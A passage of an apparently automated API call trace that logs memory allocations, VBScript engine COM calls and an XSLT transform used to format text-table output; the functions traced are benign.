then\n\x09\x09\x09GetLength = GetLength + 2\x09'assume two byte spaces\n\x09\x09else\n\x09\x09\x09GetLength = GetLength + 1\n\x09\x09end if\n\x09Next\nEnd Function\n\n ", pstrItemName=0x0, punkContext=0x0, pstrDelimiter=0x0, dwSourceContextCookie=0x0, ulStartingLineNumber=0x1, dwFlags=0x42, pvarResult=0x0, pexcepinfo=0x0 | out: pvarResult=0x0, pexcepinfo=0x0) returned 0x0 [0259.998] GetCurrentThreadId () returned 0x1838 [0259.998] realloc (_Block=0x0, _Size=0xc8) returned 0x88eeb8 [0259.998] malloc (_Size=0x24) returned 0x88bf40 [0259.998] malloc (_Size=0x804) returned 0x4e30048 [0259.998] malloc (_Size=0x14c) returned 0x4e30858 [0259.998] malloc (_Size=0x400) returned 0x4e309b0 [0259.999] malloc (_Size=0x104) returned 0x4e30db8 [0259.999] malloc (_Size=0x1004) returned 0x4e30ec8 [0260.000] malloc (_Size=0x204) returned 0x4e31ed8 [0260.001] malloc (_Size=0x404) returned 0x4e320e8 [0260.001] malloc (_Size=0x804) returned 0x4e324f8 [0260.002] malloc (_Size=0x1004) returned 0x4e32d08 [0260.005] malloc (_Size=0x2004) returned 0x4e33d18 [0260.007] malloc (_Size=0x2004) returned 0x4e35d28 [0260.008] malloc (_Size=0x4004) returned 0x4e37d38 [0260.009] free (_Block=0x4e30858) [0260.009] malloc (_Size=0x320) returned 0x4e3bd48 [0260.014] realloc (_Block=0x4e3bd48, _Size=0x4b0) returned 0x4e3bd48 [0260.014] malloc (_Size=0x3fe8) returned 0x4e3c200 [0260.016] malloc (_Size=0x8) returned 0x88b8d0 [0260.016] free (_Block=0x4e35d28) [0260.016] free (_Block=0x4e30ec8) [0260.016] free (_Block=0x4e30048) [0260.016] free (_Block=0x88bf40) [0260.016] free (_Block=0x4e309b0) [0260.016] free (_Block=0x4e3bd48) [0260.016] free (_Block=0x4e37d38) [0260.016] free (_Block=0x4e33d18) [0260.017] free (_Block=0x4e32d08) [0260.017] free (_Block=0x4e324f8) [0260.017] free (_Block=0x4e320e8) [0260.018] free (_Block=0x4e31ed8) [0260.018] free (_Block=0x4e30db8) [0260.018] malloc (_Size=0x28) returned 0x88bf40 [0260.018] malloc (_Size=0x18) returned 0x882ba0 [0260.018] malloc (_Size=0xc) returned 0x88bab8 [0260.018] free (_Block=0x88eeb8) [0260.285] VBScriptEngine5:IActiveScript:SetScriptState (This=0x88b620, ss=0) returned 0x0 [0260.292] GetUserDefaultLCID () returned 0x409 [0260.292] GetACP () returned 0x4e4 [0260.292] free (_Block=0x88c3d0) [0260.292] ISystemDebugEventFire:EndSession (This=0xa26e10) returned 0x0 [0260.292] IUnknown:Release (This=0xa26e10) returned 0x1 [0260.292] free (_Block=0x88be68) [0260.292] free (_Block=0x88dfe8) [0260.293] VBScriptEngine5:IUnknown:Release (This=0x9e5fd4) returned 0x2 [0260.293] IUnknown:Release (This=0xa26e10) returned 0x0 [0260.293] IActiveScriptSite:OnStateChange (This=0x9e5fc0, ssScriptState=0) returned 0x0 [0260.293] VBScriptEngine5:IUnknown:Release (This=0x9e5fc0) returned 0x1 [0260.293] XSLTemplate:IXSLTemplate:createProcessor (in: This=0x9e4e08, ppProcessor=0x69f9e0 | out: ppProcessor=0x69f9e0*=0x9e5da8) returned 0x0 [0260.293] FreeThreadedDOMDocument:IUnknown:AddRef (This=0x9e4c18) returned 0x2 [0260.293] IXSLProcessor:put_input (This=0x9e5da8, input=0x69f8fc*(varType=0x9, wReserved1=0x69, wReserved2=0xf9a8, wReserved3=0x69, varVal1=0x9e4c18, varVal2=0x73737290)) returned 0x0 [0260.293] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0260.294] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x90, lpConsoleScreenBufferInfo=0x69f8b0 | out: lpConsoleScreenBufferInfo=0x69f8b0) returned 1 [0260.724] IXSLProcessor:transform (in: This=0x9e5da8, pDone=0x69f9dc | out: pDone=0x69f9dc*=0xffff) returned 0x0 [0260.729] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x88b620, riid=0x736d4f50*(Data1=0xcb5bdc81, Data2=0x93c1, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x69f7d8 | out: ppvObject=0x69f7d8*=0x88b650) returned 0x0 [0260.730] VBScriptEngine5:IUnknown:Release (This=0x88b650) returned 0x3 [0260.730] VBScriptEngine5:IActiveScript:SetScriptSite (This=0x88b620, pass=0x9e5fc0) returned 0x0 [0260.730] GetCurrentThreadId () returned 0x1838 [0260.730] malloc (_Size=0x7c) returned 0x88e978 [0260.730] malloc (_Size=0x1c) returned 0x88c3d0 [0260.730] GetCurrentThreadId () returned 0x1838 [0260.730] malloc (_Size=0x44) returned 0x88be68 [0260.730] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x9e5fc0, riid=0x72db60c8*(Data1=0x539698a0, Data2=0xcdca, Data3=0x11cf, Data4=([0]=0xa5, [1]=0xeb, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x47, [6]=0xa0, [7]=0x63)), ppvObject=0x88e9d0 | out: ppvObject=0x88e9d0*=0x0) returned 0x80004002 [0260.730] VBScriptEngine5:IUnknown:AddRef (This=0x9e5fc0) returned 0x2 [0260.730] IActiveScriptSite:GetLCID (in: This=0x9e5fc0, plcid=0x69f7b8 | out: plcid=0x69f7b8*=0x409) returned 0x0 [0260.730] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0260.730] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x69f78c, cchData=6 | out: lpLCData="1252") returned 5 [0260.730] IsValidCodePage (CodePage=0x4e4) returned 1 [0260.731] IActiveScriptSite:OnStateChange (This=0x9e5fc0, ssScriptState=5) returned 0x0 [0260.731] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x9e5fc0, riid=0x72db5058*(Data1=0x51973c11, Data2=0xcb0c, Data3=0x11d0, Data4=([0]=0xb5, [1]=0xc9, [2]=0x0, [3]=0xa0, [4]=0x24, [5]=0x4a, [6]=0xe, [7]=0x7a)), ppvObject=0x88b7b8 | out: ppvObject=0x88b7b8*=0x9e5fd4) returned 0x0 [0260.731] VBScriptEngine5:IActiveScriptSiteDebug32:GetApplication (in: This=0x9e5fd4, ppda=0x88b7c0 | out: ppda=0x88b7c0*=0x0) returned 0x80004001 [0260.731] CoCreateInstance (in: rclsid=0x72db60e8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x72db60b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x88b808 | out: ppv=0x88b808*=0xa26d38) returned 0x0 [0260.731] IUnknown:AddRef (This=0xa26d38) returned 0x2 [0260.731] GetCurrentProcessId () returned 0x1834 [0260.731] GetCurrentThreadId () returned 0x1838 [0260.731] GetTickCount () returned 0x1190e70 [0260.731] ISystemDebugEventFire:BeginSession (This=0xa26d38, guidSourceID=0x72db60d8, strSessionName="VBScript:00006196:00006200:18419312") returned 0x0 [0260.731] QueryProtectedPolicy (in: PolicyGuid=0x72db52b0, PolicyValue=0x69f7b0 | out: PolicyValue=0x69f7b0) returned 0 [0260.731] VBScriptEngine5:IActiveScript:AddNamedItem (This=0x88b620, pstrName="Context", dwFlags=0xc) returned 0x0 [0260.731] GetCurrentThreadId () returned 0x1838 [0260.731] malloc (_Size=0x28) returned 0x88bf70 [0260.731] IActiveScriptSite:GetItemInfo (in: This=0x9e5fc0, pstrName="Context", dwReturnMask=0x1, ppiunkItem=0x69f778, ppti=0x0 | out: ppiunkItem=0x69f778*=0x9e5e20, ppti=0x0) returned 0x0 [0260.731] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db52e0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69f7b4 | out: ppvObject=0x69f7b4*=0x9e5e20) returned 0x0 [0260.732] IUnknown:Release (This=0x9e5e20) returned 0x2 [0260.732] malloc (_Size=0x8) returned 0x88b8e0 [0260.732] IUnknown:AddRef (This=0x9e5e20) returned 0x3 [0260.732] IUnknown:Release (This=0x9e5e20) returned 0x2 [0260.732] VBScriptEngine5:IActiveScript:SetScriptState (This=0x88b620, ss=2) returned 0x0 [0260.732] VBScriptEngine5:IUnknown:AddRef (This=0x9e5fc0) returned 0x4 [0260.732] malloc (_Size=0x20) returned 0x88eeb8 [0260.732] ISystemDebugEventFire:IsActive (This=0xa26d38) returned 0x1 [0260.732] malloc (_Size=0x14) returned 0x4e40360 [0260.733] malloc (_Size=0x2000) returned 0x4e409f8 [0260.733] IUnknown:AddRef (This=0x9e5e20) returned 0x3 [0260.733] malloc (_Size=0x658) returned 0x4e42a00 [0260.733] GetCurrentThreadId () returned 0x1838 [0260.733] IActiveScriptSite:OnEnterScript (This=0x9e5fc0) returned 0x0 [0260.738] malloc (_Size=0x20) returned 0x88eee0 [0260.741] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f260 | out: ppvObject=0x69f260*=0x0) returned 0x80004002 [0260.741] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f25c*="CountResults", cNames=0x1, lcid=0x409, rgDispId=0x69f27c | out: rgDispId=0x69f27c*=-1) returned 0x80020006 [0261.268] malloc (_Size=0x88) returned 0x88ef08 [0261.268] malloc (_Size=0x40) returned 0x88ef98 [0261.268] malloc (_Size=0x104) returned 0x4e43060 [0261.268] malloc (_Size=0x20) returned 0x4e43170 [0261.269] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f260 | out: ppvObject=0x69f260*=0x0) returned 0x80004002 [0261.269] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f25c*="PadIt", cNames=0x1, lcid=0x409, rgDispId=0x69f27c | out: rgDispId=0x69f27c*=-1) returned 0x80020006 [0261.269] malloc (_Size=0x20) returned 0x4e43198 [0261.269] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f260 | out: ppvObject=0x69f260*=0x0) returned 0x80004002 [0261.270] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f25c*="GotInstance", cNames=0x1, lcid=0x409, rgDispId=0x69f27c | out: rgDispId=0x69f27c*=-1) returned 0x80020006 [0261.270] malloc (_Size=0x20) returned 0x4e431c0 [0261.270] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f260 | out: ppvObject=0x69f260*=0x0) returned 0x80004002 [0261.270] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f25c*="GetValues", cNames=0x1, lcid=0x409, rgDispId=0x69f27c | out: rgDispId=0x69f27c*=-1) returned 0x80020006 [0261.270] malloc (_Size=0x204) returned 0x4e431e8 [0261.270] malloc (_Size=0x20) returned 0x4e433f8 [0261.270] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f260 | out: ppvObject=0x69f260*=0x0) returned 0x80004002 [0261.270] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f25c*="DisplayValues", cNames=0x1, lcid=0x409, rgDispId=0x69f27c | out: rgDispId=0x69f27c*=-1) returned 0x80020006 [0261.270] malloc (_Size=0x20) returned 0x4e43420 [0261.270] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f260 | out: ppvObject=0x69f260*=0x0) returned 0x80004002 [0261.270] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f25c*="getlength", cNames=0x1, lcid=0x409, rgDispId=0x69f27c | out: rgDispId=0x69f27c*=-1) returned 0x80020006 [0261.270] GetCurrentThreadId () returned 0x1838 [0261.270] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f2c0 | out: ppvObject=0x69f2c0*=0x0) returned 0x80004002 [0261.271] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f2bc*="sPXML", cNames=0x1, lcid=0x409, rgDispId=0x69f2dc | out: rgDispId=0x69f2dc*=-1) returned 0x80020006 [0261.271] GetCurrentThreadId () returned 0x1838 [0261.271] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f2c0 | out: ppvObject=0x69f2c0*=0x0) returned 0x80004002 [0261.271] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f2bc*="propname", cNames=0x1, lcid=0x409, rgDispId=0x69f2dc | out: rgDispId=0x69f2dc*=-1) returned 0x80020006 [0261.271] GetCurrentThreadId () returned 0x1838 [0261.271] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f2c0 | out: ppvObject=0x69f2c0*=0x0) returned 0x80004002 [0261.271] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f2bc*="lenarr", cNames=0x1, lcid=0x409, rgDispId=0x69f2dc | out: rgDispId=0x69f2dc*=-1) returned 0x80020006 [0261.271] GetCurrentThreadId () returned 0x1838 [0261.271] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f2c0 | out: ppvObject=0x69f2c0*=0x0) returned 0x80004002 [0261.271] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f2bc*="bN", cNames=0x1, lcid=0x409, rgDispId=0x69f2dc | out: rgDispId=0x69f2dc*=-1) returned 0x80020006 [0261.271] GetCurrentThreadId () returned 0x1838 [0261.271] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f2c0 | out: ppvObject=0x69f2c0*=0x0) returned 0x80004002 [0261.271] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f2bc*="iLens", cNames=0x1, lcid=0x409, rgDispId=0x69f2dc | out: rgDispId=0x69f2dc*=-1) returned 0x80020006 [0261.271] malloc (_Size=0x404) returned 0x4e43448 [0261.272] GetCurrentThreadId () returned 0x1838 [0261.272] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f2c0 | out: ppvObject=0x69f2c0*=0x0) returned 0x80004002 [0261.272] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f2bc*="iLensMax", cNames=0x1, lcid=0x409, rgDispId=0x69f2dc | out: rgDispId=0x69f2dc*=-1) returned 0x80020006 [0261.272] GetCurrentThreadId () returned 0x1838 [0261.272] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f2c0 | out: ppvObject=0x69f2c0*=0x0) returned 0x80004002 [0261.272] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f2bc*="propvalue", cNames=0x1, lcid=0x409, rgDispId=0x69f2dc | out: rgDispId=0x69f2dc*=-1) returned 0x80020006 [0261.272] GetCurrentThreadId () returned 0x1838 [0261.272] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f2c0 | out: ppvObject=0x69f2c0*=0x0) returned 0x80004002 [0261.272] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f2bc*="iRow", cNames=0x1, lcid=0x409, rgDispId=0x69f2dc | out: rgDispId=0x69f2dc*=-1) returned 0x80020006 [0261.272] GetCurrentThreadId () returned 0x1838 [0261.272] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f2c0 | out: ppvObject=0x69f2c0*=0x0) returned 0x80004002 [0261.272] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f2bc*="iResultCount", cNames=0x1, lcid=0x409, rgDispId=0x69f2dc | out: rgDispId=0x69f2dc*=-1) returned 0x80020006 [0261.272] malloc (_Size=0x328) returned 0x4e43858 [0261.643] GetCurrentThreadId () returned 0x1838 [0261.643] IActiveScriptSite:OnEnterScript (This=0x9e5fc0) returned 0x0 [0261.643] free (_Block=0x88eeb8) [0261.643] free (_Block=0x4e409f8) [0261.643] free (_Block=0x4e40360) [0261.643] ISystemDebugEventFire:IsActive (This=0xa26d38) returned 0x1 [0261.644] VBScriptEngine5:IUnknown:Release (This=0x9e5fc0) returned 0x3 [0261.644] GetCurrentThreadId () returned 0x1838 [0261.644] IActiveScriptSite:GetItemInfo (in: This=0x9e5fc0, pstrName="Context", dwReturnMask=0x1, ppiunkItem=0x69f784, ppti=0x0 | out: ppiunkItem=0x69f784*=0x9e5e20, ppti=0x0) returned 0x0 [0261.644] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db52e0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x69f76c | out: ppvObject=0x69f76c*=0x9e5e20) returned 0x0 [0261.644] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db4f34*(Data1=0xa7aba9c1, Data2=0x8983, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x69f778 | out: ppvObject=0x69f778*=0x0) returned 0x80004002 [0261.644] IActiveScriptSite:GetItemInfo (in: This=0x9e5fc0, pstrName="Context", dwReturnMask=0x2, ppiunkItem=0x0, ppti=0x69f77c | out: ppiunkItem=0x0, ppti=0x69f77c*=0x0) returned 0x80004003 [0261.644] IUnknown:Release (This=0x9e5e20) returned 0x3 [0261.644] IUnknown:Release (This=0x9e5e20) returned 0x2 [0261.644] IActiveScriptSite:OnStateChange (This=0x9e5fc0, ssScriptState=2) returned 0x0 [0261.645] VBScriptEngine5:IActiveScriptParse32:ParseScriptText (in: This=0x88b624, pstrCode="CountResults(this)", pstrItemName=0x0, punkContext=0x0, pstrDelimiter=0x0, dwSourceContextCookie=0x0, ulStartingLineNumber=0x1, dwFlags=0x20, pvarResult=0x69f6b4, pexcepinfo=0x0 | out: pvarResult=0x69f6b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4e43340, varVal2=0x0), pexcepinfo=0x0) returned 0x0 [0261.645] GetCurrentThreadId () returned 0x1838 [0261.645] realloc (_Block=0x0, _Size=0xc8) returned 0x4e409f8 [0261.645] malloc (_Size=0x24) returned 0x88c150 [0261.645] malloc (_Size=0x804) returned 0x4e40ac8 [0261.645] malloc (_Size=0x14c) returned 0x4e412d8 [0261.645] malloc (_Size=0x1004) returned 0x4e41430 [0261.645] malloc (_Size=0x104) returned 0x4e42440 [0261.645] free (_Block=0x4e412d8) [0261.645] malloc (_Size=0x204) returned 0x4e42550 [0261.645] malloc (_Size=0x40) returned 0x4e412d8 [0261.645] malloc (_Size=0x12c) returned 0x4e42760 [0261.646] malloc (_Size=0x8) returned 0x88eeb8 [0261.646] free (_Block=0x4e41430) [0261.646] free (_Block=0x4e40ac8) [0261.646] free (_Block=0x88c150) [0261.646] free (_Block=0x4e412d8) [0261.646] free (_Block=0x4e42550) [0261.646] free (_Block=0x4e42440) [0261.646] malloc (_Size=0x28) returned 0x88c090 [0261.646] realloc (_Block=0x88bab8, _Size=0x30) returned 0x4e42898 [0261.646] VBScriptEngine5:IUnknown:AddRef (This=0x9e5fc0) returned 0x4 [0261.646] malloc (_Size=0x20) returned 0x4e428d0 [0261.646] ISystemDebugEventFire:IsActive (This=0xa26d38) returned 0x1 [0261.646] malloc (_Size=0x14) returned 0x4e40380 [0261.646] malloc (_Size=0x2000) returned 0x4e43b88 [0261.646] IUnknown:AddRef (This=0x9e5e20) returned 0x3 [0261.647] GetCurrentThreadId () returned 0x1838 [0261.647] IActiveScriptSite:OnEnterScript (This=0x9e5fc0) returned 0x0 [0261.647] IUnknown:QueryInterface (in: This=0x9e5e20, riid=0x72db53f4*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x69f0e0 | out: ppvObject=0x69f0e0*=0x0) returned 0x80004002 [0261.647] IDispatch:GetIDsOfNames (in: This=0x9e5e20, riid=0x72db53e4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x69f0dc*="this", cNames=0x1, lcid=0x409, rgDispId=0x69f0fc | out: rgDispId=0x69f0fc*=-1) returned 0x80020006 [0261.681] IUnknown:AddRef (This=0x9e5e20) returned 0x4 [0261.682] GetCurrentThreadId () returned 0x1838 [0261.682] IActiveScriptSite:OnEnterScript (This=0x9e5fc0) returned 0x0 [0261.682] free (_Block=0x4e428d0) [0261.682] free (_Block=0x4e43b88) [0261.683] free (_Block=0x4e40380) [0261.683] ISystemDebugEventFire:IsActive (This=0xa26d38) returned 0x1 [0261.683] free (_Block=0x4e42760) [0261.683] free (_Block=0x88eeb8) [0261.683] free (_Block=0x88c090) [0261.683] VBScriptEngine5:IUnknown:Release (This=0x9e5fc0) returned 0x3 [0261.683] free (_Block=0x4e409f8) [0261.683] VBScriptEngine5:IActiveScriptParse32:ParseScriptText (in: This=0x88b624, pstrCode="DisplayValues(this)", pstrItemName=0x0, punkContext=0x0, pstrDelimiter=0x0, dwSourceContextCookie=0x0, ulStartingLineNumber=0x1, dwFlags=0x20, pvarResult=0x69f6b4, pexcepinfo=0x0 | out: pvarResult=0x69f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\r\n", varVal2=0x0), pexcepinfo=0x0) returned 0x0 [0261.683] GetCurrentThreadId () returned 0x1838 [0261.683] realloc (_Block=0x0, _Size=0xc8) returned 0x4e428d0 [0261.684] malloc (_Size=0x24) returned 0x88bfd0 [0261.684] malloc (_Size=0x804) returned 0x4e409f8 [0261.684] malloc (_Size=0x14c) returned 0x4e41208 [0261.684] malloc (_Size=0x1004) returned 0x4e41360 [0261.684] malloc (_Size=0x104) returned 0x4e42370 [0261.684] free (_Block=0x4e41208) [0261.684] malloc (_Size=0x204) returned 0x4e42480 [0261.684] malloc (_Size=0x40) returned 0x4e429a0 [0261.684] malloc (_Size=0x12c) returned 0x4e41208 [0261.684] malloc (_Size=0x8) returned 0x4e429e8 [0261.684] free (_Block=0x4e41360) [0261.684] free (_Block=0x4e409f8) [0261.684] free (_Block=0x88bfd0) [0261.684] free (_Block=0x4e429a0) [0261.684] free (_Block=0x4e42480) [0261.684] free (_Block=0x4e42370) [0261.684] malloc (_Size=0x28) returned 0x88bfd0 [0261.685] VBScriptEngine5:IUnknown:AddRef (This=0x9e5fc0) returned 0x4 [0261.685] malloc (_Size=0x20) returned 0x88eeb8 [0261.685] ISystemDebugEventFire:IsActive (This=0xa26d38) returned 